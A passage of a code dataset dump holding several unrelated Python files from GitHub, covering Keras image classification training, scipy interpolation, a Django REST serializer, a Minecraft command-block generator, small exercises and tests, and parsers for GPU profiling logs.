MaxPool2D\r\nfrom keras.layers import Flatten, InputLayer\r\nfrom keras.layers.normalization import BatchNormalization\r\nfrom keras.models import Sequential\r\nfrom keras.utils import np_utils\r\nfrom keras.initializers import Constant\r\nfrom keras.datasets import fashion_mnist\r\nimport numpy as np\r\nfrom glob import glob\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.misc import imresize,imread,imsave\r\nfrom sklearn.cross_validation import train_test_split\r\nimport os\r\nfrom keras.models import Model,load_model\r\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\r\nimport argparse\r\n\r\nparser = argparse.ArgumentParser(description=\"task1\")\r\nparser.add_argument(\"-tr\",\"--train_folder\",type = str, default = 'data/train/')\r\nparser.add_argument(\"-te\",\"--test_folder\",type = str, default = 'data/test/')\r\nparser.add_argument(\"-to\",\"--save_path\",type = str, default = './')\r\nargs = parser.parse_args()\r\n\r\n\r\n# Hyper Parameters\r\ntrain_folder = args.train_folder\r\ntest_folder = args.test_folder\r\nsave_path = args.save_path\r\n\r\n# Load data\r\nfile_name = train_folder\r\nimage_file = np.array(glob(os.path.join(file_name,'*')))\r\nprint(image_file.shape)\r\nlabels = []\r\n#label_file = np.array(glob('../HW5_data/FullLengthVideos/labels/train/*.txt'))\r\nfor i,file in enumerate(image_file):\r\n img_name = np.array(glob(os.path.join(file,'*.png')))\r\n img = np.array([imread(name) for name in img_name])\r\n if i == 0:\r\n imgs = img\r\n else:\r\n imgs = np.append(imgs,img,0)\r\n label = np.zeros(img.shape[0])+i\r\n labels = np.append(labels,label)\r\nprint(imgs.shape,labels.shape)\r\n\r\nx_train, x_valid, y_train, y_valid = train_test_split( imgs, labels, test_size=0.1, random_state=1 )\r\nprint(x_train.shape,x_valid.shape)\r\nprint(y_train.shape,y_valid.shape)\r\n# Function load_minst is available in git.\r\n#(x_semi_train, y_semi_train), (x_test, y_test) = fashion_mnist.load_data()\r\n#x_semi_train = x_semi_train.astype('float32') / 255\r\n#x_semi_train = x_semi_train.reshape(x_semi_train.shape[0], 28, 28, 1)\r\n# Prepare datasets\r\n# This step contains normalization and reshaping of input.\r\n# For output, it is important to change number to one-hot vector. \r\n#idx = np.random.randint(low = 0,high = 60000,size = 2000)\r\nx_train = x_train.astype('float32') / 255\r\nx_train = x_train.reshape(x_train.shape[0], 28, 28, 1)\r\n#x_train = np.repeat(x_train.astype('float32'), 3, 3)\r\nx_valid = x_valid.astype('float32') / 255\r\nx_valid = x_valid.reshape(x_valid.shape[0], 28, 28, 1)\r\n#x_valid = np.repeat(x_valid.astype('float32'), 3, 3)\r\n#x_test = x_test.astype('float32') / 255\r\n#x_test = x_test.reshape(x_test.shape[0], 28, 28, 1)\r\n#x_test = np.repeat(x_test.astype('float32'), 3, 3)\r\n\r\ny_train = np_utils.to_categorical(y_train, 10)\r\ny_valid = np_utils.to_categorical(y_valid, 10)\r\n#y_test = np_utils.to_categorical(y_test, 10)\r\n# Create model in Keras\r\nnum_classes = 10\r\n\r\nmodel = Sequential()\r\nmodel.add(InputLayer(input_shape=(28, 28, 1)))\r\nmodel.add(Conv2D(filters=32, kernel_size=(3, 3), padding=\"same\", input_shape=x_train.shape[1:], activation='relu'))\r\nmodel.add(Conv2D(filters=64, kernel_size=(3, 3), padding=\"same\", activation='relu'))\r\n#model.add(Conv2D(filters=128, kernel_size=(3, 3), padding=\"same\", activation='relu'))\r\nmodel.add(MaxPool2D(pool_size=(2, 2)))\r\nmodel.add(Dropout(0.5))\r\nmodel.add(Conv2D(filters=128, kernel_size=(3, 3), padding=\"same\", activation='relu'))\r\nmodel.add(Conv2D(filters=256, kernel_size=(3, 3), padding=\"valid\", activation='relu'))\r\n#model.add(Conv2D(filters=512, kernel_size=(3, 3), padding=\"valid\", activation='relu'))\r\nmodel.add(MaxPool2D(pool_size=(3, 3)))\r\nmodel.add(Dropout(0.5))\r\nmodel.add(Flatten())\r\nmodel.add(Dense(256,activation='relu'))\r\n#model.add(ReLU())\r\nmodel.add(Dropout(0.5))\r\nmodel.add(Dense(256,activation='relu'))\r\n#model.add(ReLU())\r\n#model2.add(Dropout(0.5))\r\nmodel.add(Dense(num_classes, activation='softmax'))\r\n\r\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\r\n#model = load_model('task1.h5')\r\ncallbacks = [ ModelCheckpoint('checkpoint/task_my_vgg.h5', monitor='val_loss', save_best_only=True, verbose=0) ]\r\nhistory = model.fit(x_train, y_train, epochs=100, batch_size=64, validation_data=(x_valid, y_valid),callbacks=callbacks)\r\nloss = history.history['loss']\r\nval_loss = history.history['val_loss']\r\nnp.save('./task_my_vgg.npy',np.array([loss,val_loss]))\r\n\r\n#score = model.evaluate(x_test, y_test, verbose=1)\r\n#print(score)","repo_name":"Gary830317/DLCV2018","sub_path":"final/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72277119272","text":"import numpy as np\nfrom scipy.interpolate import griddata\n\n\ndef img_inter_func(valid_index, values, method='nearest'):\n out_img = np.empty(values.shape, np.float32)\n X, Y = np.meshgrid(np.arange(0, values.shape[0]), np.arange(0, values.shape[1]))\n if len(values.shape) == 3:\n for i in range(values.shape[2]):\n chn = values[:, :, i]\n Ti = griddata(valid_index, chn[valid_index], (X, Y), method=method)\n out_img[:, :, i] = Ti.transpose()\n else:\n Ti = griddata(valid_index, values[valid_index], (X, Y), method=method)\n out_img = Ti.transpose()\n return out_img\n","repo_name":"junxuan-li/LRG_360Panoramic","sub_path":"Lighting_Estimation/img_interpolation.py","file_name":"img_interpolation.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"72"} +{"seq_id":"74234368234","text":"\nfrom rest_framework.serializers import ModelSerializer\nfrom rest_framework import exceptions\nfrom Books.models import Book\n\nclass BookSerializer(ModelSerializer):\n class Meta:\n model=Book\n fields = ['book_name', 'pages', 'price','author']\n\n def validate(self,data):\n print(data)\n price = data.get('price')\n if price<50:\n msg = \"data > 50\"\n raise exceptions.ValidationError('msg')\n return data\n\n\n","repo_name":"Minu94/PythonWorkBook1","sub_path":"book/BookPro/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23642777752","text":"import os\nfrom canvas import irio\nfrom canvas import Canvas\n\ncanvas_output = 'output/sample05/canvas_output.bdx'\nos.makedirs('output/sample05', exist_ok=True)\n\ncanvas = Canvas()\np = canvas\ncbs_array = [\n {'cb_mode': p.MODE_REPEAT_CB, 'command': 'cmd',\n 'cb_name': f'cb{0}', 'conditional': False}\n]\ncb_i = 1\nfor _ in range(10):\n for i in range(2):\n cbs_array.append(\n {'command': 'cmd', 'cb_name': f'cb{cb_i}', 'conditional': True, 'tick_delay': 10})\n cb_i += 1\n for i in range(3):\n cbs_array.append(\n {'command': 'cmd', 'cb_name': f'cb{cb_i}', 'conditional': False, 'tick_delay': 20})\n cb_i += 1\n\n\n# 现在的问题是,一直线的排列命令块显然是不合适的,\n# 我们需要命令块首先在一层堆叠,(dir1,dir2)\n# 当堆叠满一层后再移动到下一层 (dir3)\n# 第二个问题是,有条件命令块在拐角时无法正常工作,所以需要重排\n# 即,适当时插入多个空连锁命令块,直到可以分配位置为止\n# x,y,z 代表堆叠的起点位置\ncanvas.snake_folding_cmds(\n x=0, y=20, z=0,\n dir1=(1, 0, 0), dir1_lim=4,\n dir2=(0, 0, 1), dir2_lim=4,\n dir3=(0, 1, 0),\n cbs_array=cbs_array\n)\n\n# 也可以这么指定方向\ncanvas.snake_folding_cmds(\n x=10, y=20, z=0,\n dir1=(1, 0, 0), dir1_lim=4,\n dir2=(0, 0, -1), dir2_lim=4,\n dir3=(0, -1, 0),\n cbs_array=cbs_array\n)\n\nfinal_ir = canvas.done()\nirio.dump_ir_to_bdx(final_ir, canvas_output, need_sign=True, author='2401PT')\n","repo_name":"CMA2401PT/BDXWorkShop","sub_path":"Sample05_snake_folding.py","file_name":"Sample05_snake_folding.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"zh","doc_type":"code","stars":10,"dataset":"github-code","pt":"72"} +{"seq_id":"71682252713","text":"\nclass TradedPicks:\n def update_worksheet_with_traded_picks(roster_to_users_dict, league, worksheet):\n COLUMN_MAPPING = {\n 'previous_owner_id': lambda x: roster_to_users_dict[x],\n 'owner_id': lambda x: roster_to_users_dict[x],\n 'round': lambda x: x,\n 'season': lambda x: x\n }\n\n GSHEET_COLUMNS = ['traded_from', 'traded_to', 'round', 'season']\n\n traded_picks = league.get_traded_picks()\n\n\n traded_picks_to_upload = []\n\n for traded_pick in traded_picks:\n traded_pick_arr = []\n for api_mapping, func in COLUMN_MAPPING.items():\n traded_pick_arr.append(func(traded_pick[api_mapping]))\n traded_picks_to_upload.append(traded_pick_arr)\n\n traded_picks_to_upload.sort(key=lambda x: (x[3], x[2], x[1]), reverse=False)\n\n worksheet.batch_update([{\n 'range': 'A1:D1',\n 'values': [GSHEET_COLUMNS]},\n {'range': f\"A2:D{len(traded_picks_to_upload)+2}\",\n 'values': traded_picks_to_upload}\n ])","repo_name":"jpatdalton/sleeper_analytics","sub_path":"models/traded_picks.py","file_name":"traded_picks.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70392852073","text":"import pytest\nfrom pytest_devlife import util\ntry:\n import solution\nexcept:\n solution = None\ntry:\n if solution:\n from solution import esconde_senha\nexcept:\n pass\n\n\ndef setup():\n util.function_exists_in_module(solution, 'esconde_senha')\n\n\n@pytest.mark.parametrize(\n 'senha_visivel,senha_escondida',\n [\n pytest.param(visivel, escondida, id=visivel)\n for visivel, escondida in [\n ('batman', '******'),\n ('', ''),\n ('$&nh4!?', '*******'),\n ('*', '*'),\n ('charada?', '********'),\n ('PiNGu1n\\\\/', '*********'),\n ('*esconde*', '*********')\n ]\n ]\n)\n\n\ndef test_esconde_a_senha(senha_visivel, senha_escondida):\n resultado = esconde_senha(senha_visivel)\n assert resultado == senha_escondida, f'O número de caracteres da entrada não é compatível com o da saída.\\nDICA: para a entrada de {len(senha_visivel)} caracteres, sua função retorna {len(resultado)} caracteres.'\n","repo_name":"prady001/projects","sub_path":"python/string/exercises/esconde_senha/test_solution.py","file_name":"test_solution.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25958593456","text":"import sympy\r\nimport numpy as np\r\n\r\nmatrix_one = np.asarray([\r\n[2, -2, 4,-2],\r\n[2, 1, 10,7],[-4,4,-8,4],[4,-1,14,6] \r\n], dtype=np.float32)\r\n\r\nreduced_echolon_form=sympy.Matrix(matrix_one).rref()\r\n#print(reduced_echolon_form)\r\n\r\n#Note that accurcay might not be perfect.so double check on internet with a row echolon calculator\r\n\r\nmatrix_two = np.asarray([\r\n[1,1, -1,7],\r\n[1, -1, 2,3],[2,1,1,9] \r\n], dtype=np.float32)\r\n\r\nreduced_echolon_form2=sympy.Matrix(matrix_two).rref()\r\n#print(reduced_echolon_form2)\r\n\r\n#The result returns two tuples.The first is the reduced row echolon form.\r\n#Note column 1=x, column 2=y, column 3=z, column 4=result. \r\n#We can see that z=-2,y=-1,x=6.\r\n#The second tuple just shows where the 1 in each row are.\r\nmatrix_three = np.asarray([\r\n[30,-1,-1000],\r\n[50,-1,-100] \r\n], dtype=np.float32)\r\n\r\nreduced_echolon_form3=sympy.Matrix(matrix_three).rref()\r\nprint(reduced_echolon_form3)","repo_name":"axaa42/Linear_algebra-","sub_path":"row_echolon_form_functon.py","file_name":"row_echolon_form_functon.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39401626173","text":"import requests\nimport jsonpath\n\nfrom pprint import pprint\n\nheaders = {\n 'Authorization': 'Token bf654bd324541d783c7c4a78cf97174e47ef64d1'\n}\n\nurl_base_cursos = 'http://localhost:8000/api/v2/cursos/'\nurl_base_avaliacoes = 'http://localhost:8000/api/v2/avaliacoes/'\n\nresultado = requests.get(url=url_base_cursos, headers=headers)\npprint(resultado.json())\n","repo_name":"Erkmann/Curso-Django-Rest","sub_path":"teste_get.py","file_name":"teste_get.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24622201458","text":"\"\"\"\nCreated on 03/27/18.\n@author: Numan Laanait, Suhas Somnath\n\"\"\"\nimport json\nimport numpy as np\nfrom collections import OrderedDict\nimport multiprocessing as mp\nimport sys\nfrom os import listdir, path\nimport re\nimport os\n\n\ndef json_to_ordered_dict(file):\n \"\"\"\n Reads a timeline.json file output by Tensorflow/libcupti and returns and OrderedDict object\n :param file: .json file.\n :return: OrderedDict\n \"\"\"\n with open(file, mode='r') as f:\n def _as_ordered_dict(val):\n return OrderedDict(val)\n\n output = json.load(f, object_hook=_as_ordered_dict, object_pairs_hook=_as_ordered_dict)\n dic = OrderedDict(output)\n\n return dic\n\n\ndef get_all_ops(trace_dic):\n \"\"\"\n Params:\n trace_dic: collections.OrderedDict of traceEvent\n Return: list of dictionaries of all ops.\n \"\"\"\n try:\n trace_events = trace_dic['traceEvents']\n except KeyError:\n print('Not valid GPU trace dict object.')\n sys.exit()\n all_ops = []\n for trace in trace_events:\n try:\n if trace['cat'] == 'Op':\n all_ops.append(trace)\n except KeyError:\n pass\n return all_ops\n\n\ndef get_stream_all(trace_dic):\n \"\"\"\n Params:\n trace_dic: collections.OrderedDict of traceEvent\n Return: pid of GPU/stream:all, (stream, pid) dictionary\n \"\"\"\n try:\n trace_events = trace_dic['traceEvents']\n except KeyError:\n print('Not valid GPU trace dict object.')\n sys.exit()\n all_procs = []\n for trace in trace_events:\n try:\n if trace['name'] == 'process_name':\n all_procs.append((trace['args']['name'], trace['pid']))\n except KeyError:\n pass\n dic_procs = dict(all_procs)\n pid = dic_procs['/device:GPU:0/stream:all Compute']\n return dic_procs, pid\n\n\ndef get_unique_ops_names(all_ops):\n \"\"\"\n Find unique op names.\n Params:\n all_ops: list, of dictionary of all operations.\n Return: list of unique op names.\n \"\"\"\n return set(op['name'] for op in all_ops)\n\n\ndef get_wall_duration(op_names, all_ops, pid_list=(11, 7, 13, 15, 9)):\n \"\"\"\n Calculates wall duration for each op in op_names.\n Params:\n op_names: list (str), names of ops of interest.\n pid_list: list (str), names of pid to include.\n all_ops: output of get_all_ops().\n Return:\n total wall duration, dict['op'] = wall duration.\n \"\"\"\n # 1. Construct dictionary of op with name matching op_names\n ops_dic = OrderedDict()\n for name in op_names:\n ops = []\n for op in all_ops:\n if op['name'] == name:\n ops.append(op)\n ops_dic[name] = ops\n\n # 2. get duration for each op\n op_dict = OrderedDict()\n total_dur = 0\n for op_name in op_names:\n op_dur = 0\n for itm in ops_dic[op_name]:\n if itm['pid'] in pid_list:\n op_dur += itm['dur']\n op_dict[op_name] = op_dur * 1e-3 # convert from us to ms\n total_dur += op_dur * 1e-3\n\n # fixing the NCCL key:\n op_dict['unknown (nccl AllReduceKernel_sum_)'] = op_dict.pop('unknown')\n\n # Sorting durations:\n sorted_dur = sorted(op_dict.items(), key=lambda x: x[1])[::-1]\n # sorted_dur = sorted(op_dict.items(), key=operator.itemgetter(1))\n\n return OrderedDict(sorted_dur), total_dur\n\n\ndef print_timeline_stats(sorted_dur, total_dur, min_msec=5):\n \"\"\"\n Prints the total time and times per op so long as the time was > min_msec\n :param sorted_dur: OrderedDict object with time per op. Times in msec\n :param total_dur: Number - total wall time per step. Time in msec\n :param min_msec: Number, optional - minimum wall time for op\n \"\"\"\n print('Total Wall Duration (ms): %4.3f\\n' % total_dur)\n print('OPS with wall duration > 5 ms:')\n for key, val in sorted_dur.items():\n if val > min_msec:\n print('%s : %3.3f ms' % (key, val))\n\n\ndef parse_single_timeline(curr_file):\n \"\"\"\n Parses a single timeline file and extracts the time per op and total wall time\n\n :param curr_file: str / unicode - path to a single timeline .json file\n :return dicts: OrderedDict object with time per op. Times in msec\n :return tot_times: Number - total wall time per step. Time in msec\n \"\"\"\n dic = json_to_ordered_dict(curr_file)\n all_ops = get_all_ops(dic)\n unique_op_names = get_unique_ops_names(all_ops)\n proc_dic, stream_all_pid = get_stream_all(dic)\n sorted_dur_dicts, total_dur = get_wall_duration(unique_op_names, all_ops, pid_list=[stream_all_pid])\n return sorted_dur_dicts, total_dur\n\n\ndef parse_all_timeline_files(folder, prefix='timeline', suffix='.json'):\n \"\"\"\n Parses all timeline files in the given dictionary to extract the times per op and total wall time\n\n :param folder: str / unicode - path to directory containing all the timeline json files\n :param prefix: str / unicode (optional) - Prefix for the file names. Default = 'timeline'\n :param suffix: str / unicode (optional) - suffix for the file names. Default = '.json'\n :return dicts: list of OrderedDict objects per timeline file. Times in msec\n :return tot_times: list of Numbers with the total wall time per step. Times in msec\n \"\"\"\n\n files = []\n for name in listdir(folder):\n if name.startswith(prefix) and name.endswith(suffix):\n files.append(path.join(path.abspath(folder), name))\n\n dicts = []\n tot_times = []\n if len(files) > 16:\n cores = 4\n pool = mp.Pool(cores)\n jobs = pool.imap(parse_single_timeline, files)\n results = [j for j in jobs]\n pool.close()\n for item in results:\n dicts.append(item[0])\n tot_times.append(item[1])\n else:\n for curr_file in files:\n sorted_dur_dicts, total_dur = parse_single_timeline(curr_file)\n dicts.append(sorted_dur_dicts)\n tot_times.append(total_dur)\n\n return dicts, tot_times\n\n\ndef parse_nvprof_csv(nvprof_csv):\n \"\"\"\n Extract data from nvprof and calculate/return OPS, FLOPS.\n \"\"\"\n p = re.compile(r'Device')\n with open(nvprof_csv) as f:\n skip_ln = 0\n while (True):\n line = f.readline()\n match = p.search(line)\n if match:\n fields = line\n skip_ln += 1\n break\n if skip_ln > 20:\n print('The provided file is missing nvprof headers!')\n break\n skip_ln += 1\n fields = fields.split(',')\n # Now that the number of header rows are known, the rest can be extracted easily\n arr = np.genfromtxt(nvprof_csv, skip_header=skip_ln, delimiter='Floating Point Operations(Single Precision)',\n comments='==', dtype=None, encoding=None)\n\n logs = dict()\n # it would have been easier if we could use pandas dataframes but that's not available\n for lhs, rhs in arr:\n lhs_splits = lhs.split(',')\n rhs_splits = rhs.split(',')\n logs[','.join(lhs_splits[1:-3])] = {'invocations': int(lhs_splits[-3]),\n 'min_ops': int(float(rhs_splits[1])),\n 'max_ops': int(float(rhs_splits[2])),\n 'avg_ops': int(float(rhs_splits[3]))}\n return logs\n\n\ndef sum_nvprof_ops(nvprof_dict):\n sum_min = 0\n sum_max = 0\n sum_avg = 0\n for key, val in nvprof_dict.items():\n sum_min += val['min_ops']\n sum_max += val['max_ops']\n sum_avg += val['avg_ops']\n return sum_min, sum_max, sum_avg\n\n\ndef cluster_nvprof_ops(nvprof_dict, verbose=False):\n translation = {'convolve_sgemm': 'conv', 'volta_gcgemm': 'volta_gcgemm', 'relu': 'relu',\n 'fft2d_r2c': 'fft2d_r2c', 'fft2d_c2r': 'fft2d_c2r',\n 'EigenMetaKernel> contains >> ' + spec_name)\n old_val = new_dict.get(gen_name, None)\n if old_val is not None:\n if verbose:\n print('existing entry:', old_val)\n print('current entry:', new_val)\n for prop_name in ['min_ops', 'max_ops', 'avg_ops', 'invocations']:\n new_val[prop_name] += old_val[prop_name]\n else:\n if verbose:\n print('no prior entry found. Using current entry:', new_val)\n new_dict[gen_name] = new_val\n grouped = True\n count += 1\n if not grouped:\n if verbose:\n print('Could not group key:', key)\n new_dict[key] = new_val\n if verbose:\n print('')\n print('Collapsed {} of {} entries'.format(count, len(nvprof_dict)))\n return new_dict\n\n\ndef sort_nvprof_dict(nvprof_dict, sort_key='avg_ops'):\n new_dict = dict()\n for key, val_dict in nvprof_dict.items():\n new_dict[key] = val_dict[sort_key]\n sorted_dict = sorted(new_dict.items(), key=lambda x: x[1])[::-1]\n return OrderedDict(sorted_dict)\n\n\n# http://imatge-upc.github.io/telecombcn-2016-dlcv/slides/D2L1-memory.pdf\n\ndef conv(inputs, params, bytesize):\n # NCHW not NHWC\n num_weights = np.prod(params['kernel'] + [params['features'], inputs[1]])\n outputs = tuple([inputs[0], params['features'], inputs[2] // params['stride'][0], inputs[3] // params['stride'][1]])\n mem = np.prod(outputs) * bytesize\n # account for the stride as well!\n this_ops = np.prod(list(params['kernel']) + [inputs[1]] + list(outputs[2:]) + [params['features']])\n return outputs, num_weights, mem, this_ops\n\n\ndef linear(inputs, params, bytesize):\n if len(inputs) == 4:\n inputs = (inputs[0], np.prod(inputs[1:]))\n outputs = (inputs[0], params['bias'])\n num_weights = params['bias'] + np.prod([params['bias'], inputs[1]]) + batch_norm(inputs)\n mem = np.prod(outputs) * bytesize\n this_ops = inputs[1] * params['weights']\n return outputs, num_weights, mem, this_ops\n\n\ndef pool(inputs, params, bytesize):\n outputs = (inputs[0], inputs[1], inputs[2] // params['stride'][0], inputs[3] // params['stride'][1])\n mem = np.prod(outputs) * bytesize\n return outputs, 0, mem, 0\n\n\ndef residual(orig_inputs, params, bytesize):\n weights = 0\n mem = 0\n ops = 0\n inputs = orig_inputs\n for layer_name, layer_params in list(params.items()):\n if not layer_name.startswith('conv'):\n continue\n outputs, curr_weights, curr_mem, curr_ops = conv(inputs, layer_params, bytesize)\n weights += curr_weights + batch_norm(outputs)\n mem += curr_mem\n ops += curr_ops\n # print('\\t%s - %s, weights: %3.1e, memory: %3.1f MB, ops: %3.1e' % \\\n # (layer_name, outputs, curr_weights, curr_mem / 1024**2, curr_ops))\n inputs = outputs\n # last conv for\n if outputs != orig_inputs:\n shortcut_parms = {\"kernel\": [1, 1], \"features\": outputs[1], \"batch_norm\": True, \"stride\": [1, 1]}\n orig_inputs, curr_weights, curr_mem, curr_ops = conv(orig_inputs, shortcut_parms, bytesize)\n weights += curr_weights\n mem += curr_mem\n ops += curr_ops\n return outputs, weights, mem, ops\n\n\ndef batch_norm(inputs):\n return 2 * inputs[1]\n\n\ndef calculate_network_complexity(inputs, network, is_fp16=False, verbose=False):\n bytesize = 4\n if is_fp16:\n bytesize = 2\n\n layer_stats = []\n tot_weights = 0\n tot_mem = np.prod(inputs) * bytesize\n tot_ops = 0\n\n if verbose:\n print('Inputs: %s, memory: %3.1f MB' % (inputs, tot_mem / 1024 ** 2))\n for layer_name, layer_params in list(network.items()):\n # print('-------------------------')\n # print(layer_name, layer_params)\n if layer_params['type'] == 'convolutional':\n func = conv\n elif layer_params['type'] == 'pooling':\n func = pool\n elif layer_params['type'] in ['fully_connected', 'linear_output']:\n func = linear\n elif layer_params['type'] == 'residual':\n func = residual\n else:\n print('Unrecognized layer type ' + layer_params['type'])\n break\n outputs, weights, mem, this_ops = func(inputs, layer_params, bytesize)\n if verbose:\n print('%s - %s, weights: %d, memory: %3.1f MB, ops: %3.1e' % (\n layer_name, outputs, weights, mem / 1024 ** 2, this_ops))\n inputs = outputs\n tot_ops += this_ops\n tot_mem += mem\n tot_weights += weights\n layer_stats.append({'name': layer_name, 'shape': outputs, 'weights': weights, 'memory': mem, 'ops': this_ops,\n 'type': layer_params['type']})\n if verbose:\n print('Total # of layers: %d, weights: %3.1e, memory: %s MB, ops: %3.2e \\n' % (len(network), tot_weights,\n tot_mem / 1024 ** 2, tot_ops))\n return layer_stats, tot_weights, tot_mem, tot_ops\n\n\nimport os\nimport re\nfrom collections import OrderedDict\nimport numpy as np\nimport sys\n\nFWD_ALGO_list=[\n\"CUDNN_CONVOLUTION_FWD_ALGO_IMPLICIT_GEMM\",\n\"CUDNN_CONVOLUTION_FWD_ALGO_IMPLICIT_PRECOMP_GEMM\",\n\"CUDNN_CONVOLUTION_FWD_ALGO_GEMM\",\n\"CUDNN_CONVOLUTION_FWD_ALGO_DIRECT\",\n\"CUDNN_CONVOLUTION_FWD_ALGO_FFT\",\n\"CUDNN_CONVOLUTION_FWD_ALGO_FFT_TILING\",\n\"CUDNN_CONVOLUTION_FWD_ALGO_WINOGRAD\",\n\"CUDNN_CONVOLUTION_FWD_ALGO_WINOGRAD_NONFUSED\"]\n\nBWD_ALGO_DATA_list= [\n\"CUDNN_CONVOLUTION_BWD_DATA_ALGO_0\",\n\"CUDNN_CONVOLUTION_BWD_DATA_ALGO_1\",\n\"CUDNN_CONVOLUTION_BWD_DATA_ALGO_FFT\",\n\"CUDNN_CONVOLUTION_BWD_DATA_ALGO_FFT_TILING\",\n\"CUDNN_CONVOLUTION_BWD_DATA_ALGO_WINOGRAD\",\n\"CUDNN_CONVOLUTION_BWD_DATA_ALGO_WINOGRAD_NONFUSED\"]\n\n\nBWD_ALGO_FILTER_list=[\"CUDNN_CONVOLUTION_BWD_FILTER_ALGO_0\",\n\"CUDNN_CONVOLUTION_BWD_FILTER_ALGO_1\",\n\"CUDNN_CONVOLUTION_BWD_FILTER_ALGO_FFT\",\n\"CUDNN_CONVOLUTION_BWD_FILTER_ALGO_3\",\n\"CUDNN_CONVOLUTION_BWD_FILTER_WINOGRAD_NONFUSED\",\n\"CUDNN_CONVOLUTION_BWD_FILTER_ALGO_FFT_TILING\"]\n\nFWD_ALGO_TENSORCORE=[\"CUDNN_CONVOLUTION_FWD_ALGO_IMPLICIT_PRECOMP_GEMM\",\n\"CUDNN_CONVOLUTION_FWD_ALGO_WINOGRAD_NONFUSED\"\n]\n\nBWD_ALGO_DATA_TENSORCORE=[\"CUDNN_CONVOLUTION_BWD_DATA_ALGO_1\",\n\"CUDNN_CONVOLUTION_BWD_DATA_ALGO_WINOGRAD_NONFUSED\"]\n\nBWD_ALGO_FILTER_TENSORCORE=[\"CUDNN_CONVOLUTION_BWD_FILTER_ALGO_1\",\n\"CUDNN_CONVOLUTION_BWD_FILTER_ALGO_WINOGRAD_NONFUSED\"]\n\nMATH_OPS_list= ['CUDNN_TENSOR_OP_MATH', 'CUDNN_DEFAULT_MATH']\n\ndef todict(LIST):\n return OrderedDict([(itm, [re.compile(itm), 0]) for itm in LIST])\n\n\ndef count_occurences(filepath, line_bounds, ord_dict_list, portion=0.5):\n line_lb, line_ub = line_bounds\n with open(filepath,'r') as f:\n for (num_line,line) in enumerate(f):\n if num_line > line_lb and num_line < line_ub:\n for ord_dict in ord_dict_list:\n for key, itm in ord_dict.items():\n if itm[0].search(line):\n ord_dict[key][1] += 1\n\n\ndef rank_entries(ord_dict_list, steps):\n FWD_ALGO_TENSORCORE=[\"CUDNN_CONVOLUTION_FWD_ALGO_IMPLICIT_PRECOMP_GEMM\",\n \"CUDNN_CONVOLUTION_FWD_ALGO_WINOGRAD_NONFUSED\"\n ]\n\n BWD_ALGO_DATA_TENSORCORE=[\"CUDNN_CONVOLUTION_BWD_DATA_ALGO_1\",\n \"CUDNN_CONVOLUTION_BWD_DATA_ALGO_WINOGRAD_NONFUSED\"]\n\n BWD_ALGO_FILTER_TENSORCORE=[\"CUDNN_CONVOLUTION_BWD_FILTER_ALGO_1\",\n \"CUDNN_CONVOLUTION_BWD_FILTER_ALGO_WINOGRAD_NONFUSED\"]\n entries = dict()\n for ord_dict in ord_dict_list:\n arr_counts = np.array([itm[1] for _, itm in ord_dict.items()])\n indices = np.argsort(arr_counts)[::-1]\n keys = list(ord_dict.keys())\n print('Trace from training step=%d to step=%d' %(steps[0], steps[1]))\n print('CUDA FUNCTION, # CUDA CALLS, TENSORCORES USAGE')\n for ind in indices:\n algo_name = keys[ind]\n if algo_name in FWD_ALGO_TENSORCORE+BWD_ALGO_DATA_TENSORCORE+BWD_ALGO_FILTER_TENSORCORE:\n tensorcore_usage = \"YES\"\n else:\n tensorcore_usage = \"NO\"\n print('%s, %d ,%s ' %(algo_name, ord_dict[algo_name][1], tensorcore_usage))\n entries[algo_name]={'stats':ord_dict[algo_name][1], 'tensor_core':tensorcore_usage}\n print('\\n')\n return entries\n\ndef get_step_timing(logfile):\n step_1 = re.compile('step= 90')\n step_2 = re.compile('step= 100')\n times, steps = [], []\n with open(logfile, mode='r') as f:\n for line in f:\n if step_1.search(line) or step_2.search(line):\n stream = line.split(',')\n time = stream[0].split('=')[-1]\n step = stream[1].split('=')[-1]\n times.append(float(time))\n steps.append(int(step))\n return times, steps\n\ndef get_lines_bounds(times, logfile):\n pattern = re.compile('Time:')\n lines = []\n with open(logfile, mode='r') as f:\n for i,line in enumerate(f):\n if pattern.search(line):\n stream=line\n stream=line.split(' ')[-3]\n time_list = re.findall('\\d+',stream)\n total_time = int(time_list[0])*3600*24 + int(time_list[1])*3600 + int(time_list[2])*60 + int(time_list[3])\n if total_time > times[0] or total_time < total_time: lines.append(i)\n return lines[0], lines[-1]\n\n\ndef parse_cudnn_log(cuddn_logfile, train_logfile):\n # Dictionaries\n FWD_ALGO = todict(FWD_ALGO_list)\n BWD_DATA_ALGO = todict(BWD_ALGO_DATA_list)\n BWD_FILTER_ALGO = todict(BWD_ALGO_FILTER_list)\n MATH_OPS = todict(MATH_OPS_list)\n ord_dict_list = [FWD_ALGO, BWD_DATA_ALGO, BWD_FILTER_ALGO, MATH_OPS]\n # parsing\n times, steps = get_step_timing(train_logfile)\n line_lb, line_ub = get_lines_bounds(times, cudnn_logfile)\n count_occurences(cudnn_logfile, [line_lb, line_ub], ord_dict_list, portion=0.75)\n _ = rank_entries(ord_dict_list, steps)\n #TODO: save dict as CSV or don't use dict.\n","repo_name":"nlaanait/stemdl","sub_path":"stemdl/ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":19004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6814353037","text":"from 